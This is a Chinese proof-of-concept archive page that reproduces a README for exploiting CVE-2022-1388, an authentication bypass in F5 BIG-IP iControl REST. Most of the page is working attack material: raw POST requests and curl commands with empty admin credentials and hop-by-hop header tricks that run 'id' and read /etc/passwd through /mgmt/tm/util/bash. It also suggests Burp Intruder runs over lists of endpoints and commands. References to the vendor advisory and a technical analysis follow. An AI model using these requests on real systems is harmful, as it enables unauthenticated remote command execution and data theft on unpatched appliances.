关联漏洞
标题:
F5 BIG-IP 访问控制错误漏洞
(CVE-2022-1388)
描述:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
描述
F5 BIG-IP RCE exploitation (CVE-2022-1388)
介绍
# F5 BIG-IP RCE exploitation (CVE-2022-1388)
<p align="center">
<img src="https://user-images.githubusercontent.com/3140111/167378663-f1387d6d-dc49-431d-8550-cd8d5a993c66.png">
</p>
POST (1):
```ruby
POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0
{"command": "run" , "utilCmdArgs": " -c 'id' " }
```
curl commandliner:
```ruby
$ curl -i -s -k -X $'POST' \
-H $'Host: <redacted>:8443' \
-H $'Authorization: Basic YWRtaW46' \
-H $'Connection: keep-alive, X-F5-Auth-Token' \
-H $'X-F5-Auth-Token: 0' \
-H $'Content-Length: 52' \
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' \
$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080
```
POST (2):
```ruby
POST /mgmt/tm/util/bash HTTP/1.1
Host: <redateced>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0
{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }
```
curl commandliner:
```ruby
$ curl -i -s -k -X $'POST' \
-H $'Host: <redacted>:8443' \
-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' \
-H $'X-F5-Auth-Token: 0' \
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a' \
$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080
```
Note:
```
Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>"
+ value of headers ,see "HTTP hop_by_hop request headers"...
```
My BIG-IP now fixed:
References and Fixes : </br>
* https://support.f5.com/csp/article/K23605346<br>
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
Here the documentation used latest nites:
* https://clouddocs.f5.com/api/icontrol-rest/
HTTP hop_by_hop request headers:
* https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open
F5 iControl REST Endpoint Authentication Bypass Technical Deep Dive by horizon3
* https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
My notes:
* Updated with my icontrol endpoints and commands list used on my research (extracted from public documentation)
* Could use Burp with "cluster bomb" or "Battering ram" (simple list) e.g
**Payload1**: icontrol_api_endpoints.txt <br/>
**Payload2**: icontrol_api_commands.txt <br/>
# Author
Alex Hernandez aka <em><a href="https://twitter.com/_alt3kx_" rel="nofollow">(@\_alt3kx\_)</a></em>
文件快照
[4.0K] /data/pocs/9345c1442e458ed896f38d93fc91271f393938f0
├── [2.9K] icontrol_api_commands.txt
├── [ 56K] icontrol_api_endpoints.txt
├── [ 34K] LICENSE
└── [2.8K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。